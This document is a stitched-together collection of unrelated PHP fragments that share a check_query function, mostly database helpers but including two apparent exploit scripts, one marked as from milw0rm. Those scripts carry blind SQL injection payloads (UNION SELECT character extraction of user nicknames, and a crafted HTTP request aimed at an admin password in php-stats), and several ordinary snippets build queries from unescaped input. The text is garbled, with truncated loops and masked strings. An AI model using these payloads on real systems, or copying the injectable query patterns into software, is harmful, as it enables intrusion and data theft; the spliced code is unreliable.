function insert_data() { $i = 0; $size = sizeof($curl_result['report']['completed_test']); $seed = 1 + $size / 2; for ($i; $i < $size; $i++) { $name = $curl_result['report']['completed_test'][$i]['candidate_name']; $CId_HR = $curl_result['report']['completed_test'][$i]['candidate_id']; //echo $i+1 ." " . $CId_HR ." ". $name. " " .$seed; $query = "INSERT INTO coders (Id,CId_HR,Name,Seed) values ({$i}+1,{$CId_HR},'{$name}',{$seed})"; $response = mysqli_query($conn, $query); check_query($response); } }
if (isset($_POST["Submit"])) { //The post values have to be the same as the form <name> tag $datetime = $_POST['Datetime']; //validaton $required_fields = array("Datetime"); validate_presences($required_fields); if (!empty($errors)) { $_SESSION["errors"] = $errors; redirect_to('reserve.php'); } //defining the query $sql = "INSERT INTO Reserve "; $sql .= "(DateAndTime, CustomerID) "; $sql .= "VALUES ('{$datetime}', (SELECT CustomerID from Customer WHERE CustomerID='" . $_SESSION['user_id'] . "'))"; $result = mysqli_query($connection, $sql); check_query($result); //message when registration passes or fails if ($result) { $_SESSION["message"] = "Planning succesvol"; redirect_to('user.php'); } else { $_SESSION["message"] = "Planning mislukt"; } } ?> <body> <div id="wrapper"> <!-- HEADERIMG --> <?php
// a-z for ($j = 65; $j <= 90; $j++) { $char = array_merge($char, array($j)); } // A-Z for ($j = 48; $j <= 57; $j++) { $char = array_merge($char, array($j)); } // 0-9 $index = 1; $user = ""; print "\n[-] Username: "******"\n[-] Exploit failed...\n"); } $sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/nickname,1,1,1/**/FROM/**/{$pre}_users/**/" . "WHERE/**/id={$uid}/**/AND/**/ORD(SUBSTR(nickname,{$index},1))={$char[$i]}/*"; if (check_query($sql)) { $user .= chr($char[$i]); print chr($char[$i]); break; } } $index++; } print "\n\n[-] Successfull!\n"; ?> # milw0rm.com [2007-12-27]
function find_employee_by_email($email) { global $connection; $safe_email = mysqli_real_escape_string($connection, $email); $query = "SELECT * "; $query .= "FROM Employees "; $query .= "WHERE User = '******' "; $query .= "LIMIT 1"; $user_set = mysqli_query($connection, $query); check_query($user_set); if ($user = mysqli_fetch_assoc($user_set)) { return $user; } else { return null; } }
function update_66() { if ($GLOBALS["db_type"] == "pgsql") { update_sql("CREATE TABLE {path} (\n pid serial,\n src varchar(128) NOT NULL default '',\n dst varchar(128) NOT NULL default '',\n PRIMARY KEY (pid)\n )"); update_sql("CREATE INDEX path_src_idx ON {path}(src)"); update_sql("CREATE INDEX path_dst_idx ON {path}(dst)"); $result = db_query("SELECT nid, path FROM {node} WHERE path != ''"); while ($node = db_fetch_object($result)) { update_sql("INSERT INTO {path} (src, dst) VALUES ('node/view/{$node->nid}', '" . check_query($node->path) . "')"); } } else { update_sql("CREATE TABLE {path} (\n pid int(10) unsigned NOT NULL auto_increment,\n src varchar(128) NOT NULL default '',\n dst varchar(128) NOT NULL default '',\n PRIMARY KEY (pid),\n UNIQUE KEY src (src),\n UNIQUE KEY dst (dst)\n )"); // Migrate the existing paths: $result = db_query("SELECT nid, path FROM {node} WHERE path != ''"); while ($node = db_fetch_object($result)) { update_sql("INSERT INTO {path} (src, dst) VALUES ('node/view/{$node->nid}', '" . check_query($node->path) . "')"); } update_sql("ALTER TABLE {node} DROP path"); } }
function set_table() { global $host, $path, $prefix; // insert a record into _pages table... $pck = "GET {$path}php-stats.recphp.php HTTP/1.1\r\n"; $pck .= "Host: {$host}\r\n"; $pck .= "Keep-Alive: 300\r\n"; $pck .= "Connection: keep-alive\r\n\r\n"; http_send($host, $pck); // ...and try to inject sql $sql = "-1' UNION SELECT CONCAT(CHAR(39),' OR 1=1',CHAR(47),CHAR(42)) FROM {$prefix}_config WHERE name='admin_pass'/*"; $sql = str_replace("%27", "%2527", urlencode($sql)); $get = "visitor_id=acbd18db4cc2f85cedef654fccc4a4d8"; $get .= "&t=_default_value_"; $get .= "&ip={$sql}"; $pck = "GET {$path}php-stats.recjs.php?{$get} HTTP/1.1\r\n"; $pck .= "Host: {$host}\r\n"; $pck .= "Keep-Alive: 300\r\n"; $pck .= "Connection: keep-alive\r\n\r\n"; $html = http_send($host, $pck); if (!check_query("/_default_value_/")) { die("\n[-] Exploit failed...probably magic_quotes_runtime = on\n"); } }
function find_sale_by_dates($start_date, $end_date) { global $con; $start_date = date("Y-m-d", strtotime($start_date)); $end_date = date("Y-m-d", strtotime($end_date)); $sql = "SELECT s.date, p.name,p.sale_price,p.buy_price,"; $sql .= "COUNT(s.product_id) AS total_records,"; $sql .= "SUM(s.qty) AS total_sales,"; $sql .= "SUM(p.sale_price * s.qty) AS total_saleing_price,"; $sql .= "SUM(p.buy_price * s.qty) AS total_buying_price "; $sql .= "FROM sales s "; $sql .= "LEFT JOIN products p ON s.product_id = p.id"; $sql .= " WHERE s.date BETWEEN '{$start_date}' AND '{$end_date}'"; $sql .= " GROUP BY DATE(s.date),p.name"; $sql .= " ORDER BY DATE(s.date) DESC"; $result = mysqli_query($con, $sql); if ($result) { $results = while_loop($result); } else { check_query($result); } return $results; }
$list = $match[1]; } else { if (preg_match("/mailing list ([^@]+)/", $header["delivered-to"], $match)) { $list = $match[1]; } else { if (preg_match("/<([^@]+)/", $header["x-mailing-list"], $match)) { $list = $match[1]; } else { if (preg_match("/([^@]+)/", $header["x-loop"], $match)) { $list = $match[1]; } else { if (preg_match("/([^@\\.]+)/", $header["x-list-id"], $match)) { $list = $match[1]; // Mailman } else { if (preg_match("/([^@\\.]+)/", $header["x-list"], $match)) { $list = $match[1]; } else { $list = ""; } } } } } } } /* ** Insert the mail into the database: */ db_query("INSERT INTO mail (data, subject, header_from, header_to, header_cc, header_reply_to, body, list, timestamp) VALUES ('" . check_query($mail) . "', '" . check_query($header["subject"]) . "', '" . check_query($header["from"]) . "', '" . check_query($header["to"]) . "', '" . check_query($header["cc"]) . "', '" . check_query($header["reply-to"]) . "', '" . check_query($body) . "', '" . check_query($list) . "', '" . check_query(time()) . "')");
function select_users() { global $db; $query = "SELECT * from users"; $result = mysqli_query($db, $query); check_query($result); return $result; }
function find_page_byid($page_id) { global $connect; $safe_page_id = mysqli_real_escape_string($connect, $page_id); $query = "SELECT *"; $query .= " FROM pages"; $query .= " WHERE id = {$safe_page_id}"; $query .= " LIMIT 1"; $result = $connect->query($query); check_query($result); if ($page = $result->fetch_assoc()) { return $page; } else { return null; } }